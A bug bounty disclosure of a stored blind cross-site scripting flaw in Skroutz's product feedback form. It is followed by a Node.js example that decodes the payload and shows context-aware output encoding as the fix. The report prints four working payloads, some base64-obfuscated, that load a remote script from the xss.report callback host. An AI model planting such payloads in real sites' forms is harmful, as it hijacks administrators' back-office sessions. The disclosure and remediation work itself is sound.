Blind Cross-Site Scripting (XSS) in SKU/product/shop reviews/feedback

Disclosed by rawezh_1
  • Engagement: Skroutz Public Managed Bug Bounty
  • Disclosed: over 1 year ago
  • Points: 10
  • Priority: P3 (Bugcrowd VRT priority rating)
  • Status: Resolved (accepted and fixed)
Summary by Skroutz Public Managed Bug Bounty

Mr. @rawezh_1 has identified a stored blind cross-site scripting vulnerability that affects our application.
More specifically, our product feedback form reflected the stored JavaScript code back to our back-office application, giving the attacker visibility of internal pages and users and/or potential limited-scope code execution, requiring a human action.
The payload is straightforward, similar to the examples below:

'"><script src=//xss.report/s/rawezh123></script>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL3Jhd2V6aDEyMyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; onerror=eval(atob(this.id))>
javascript:eval('var a=document.createElement(\'script\');a.src=\'//xss.report/s/rawezh123\';document.body.appendChild(a)')
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL3Jhd2V6aDEyMyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; autofocus>

To verify the payload trigger, the xss.report domain was used.
Thanks to Mr. @rawezh_1 we were able to pinpoint and fix the issue in a timely manner.
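
The mechanics behind the payloads above, as an added example that is not part of this disclosure and not Skroutz's code: it decodes the base64 blob carried in the img/input payloads to show what eval(atob(this.id)) actually runs, renders the stored feedback the way a back-office page would (raw, then encoded), and applies a separate URL-context check for the javascript: variant. The review field names, the back-office markup, and the function names are assumptions for illustration; the payload strings and the xss.report host are the ones quoted above.

```javascript
// Added example (not from the disclosure or Skroutz). Node.js, no dependencies.

// The id attribute carried by the img/input payloads. onerror/onfocus run
// eval(atob(this.id)), so the script loader never appears in the stored text
// and survives filters that only look for "<script".
const PAYLOAD_ID =
  "dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL3Jhd2V6aDEyMyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=";

function decodePayloadId(id) {
  return Buffer.from(id, "base64").toString("utf8");
}

// Constructed sample rows: the payload shapes from the report as they would sit
// in a reviews table after submission. The sku/comment field names are assumed.
const STORED_REVIEWS = [
  { sku: "12345", comment: `'"><script src=//xss.report/s/rawezh123></script>` },
  { sku: "12345", comment: `"><img src=x id=${PAYLOAD_ID} onerror=eval(atob(this.id))>` },
  { sku: "12345", comment: `"><input onfocus=eval(atob(this.id)) id=${PAYLOAD_ID} autofocus>` },
];

// The javascript: payload only fires where stored text becomes a URL (for
// example a reviewer "website" field rendered into href); as text it is inert.
const STORED_LINK =
  "javascript:eval('var a=document.createElement(\\'script\\');a.src=\\'//xss.report/s/rawezh123\\';document.body.appendChild(a)')";

// Vulnerable rendering (assumed back-office shape): stored text concatenated
// straight into markup, as an innerHTML widget or unescaped template would do.
function renderReviewUnsafe(review) {
  return `<div class="review" data-sku="${review.sku}">${review.comment}</div>`;
}

// Encoder for HTML text and quoted-attribute contexts.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Encoder for URL contexts: allow only http(s), then HTML-encode the result.
// A javascript: value becomes a harmless "#" instead of an executable URL.
function safeHref(url) {
  let parsed;
  try {
    parsed = new URL(String(url));
  } catch {
    return "#";
  }
  const ok = parsed.protocol === "http:" || parsed.protocol === "https:";
  return ok ? escapeHtml(parsed.href) : "#";
}

// Hardened rendering: every interpolation goes through the encoder for its context.
function renderReviewSafe(review) {
  return `<div class="review" data-sku="${escapeHtml(review.sku)}">${escapeHtml(review.comment)}</div>`;
}

// Crude check used only to make the difference visible: after removing the
// wrapper we emit ourselves, does anything tag-like remain? Encoded output
// contains no "<" at all, so nothing in it can become an element or handler.
function hasActiveMarkup(html) {
  const body = html
    .replace(/^<div class="review" data-sku="[^"]*">/, "")
    .replace(/<\/div>$/, "");
  return /<[a-z\/!]/i.test(body);
}

function demo() {
  const results = STORED_REVIEWS.map((r) => ({
    unsafe: hasActiveMarkup(renderReviewUnsafe(r)),
    safe: hasActiveMarkup(renderReviewSafe(r)),
  }));
  return { decoded: decodePayloadId(PAYLOAD_ID), results, href: safeHref(STORED_LINK) };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Running it prints the decoded loader (a script element pointing at //xss.report/s/rawezh123), shows each stored payload producing a live tag under the raw renderer and none under the encoded one, and maps the javascript: link to "#". The point for the fix is the per-context split: the same encoder is not enough for text, attributes and URLs, and the back-office view needs it regardless of whatever validation the public feedback form does.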

Summary by rawezh_1

This submission is about a blind XSS that I found on the product feedback. Now this vulnerability is fixed; thanks to the team.
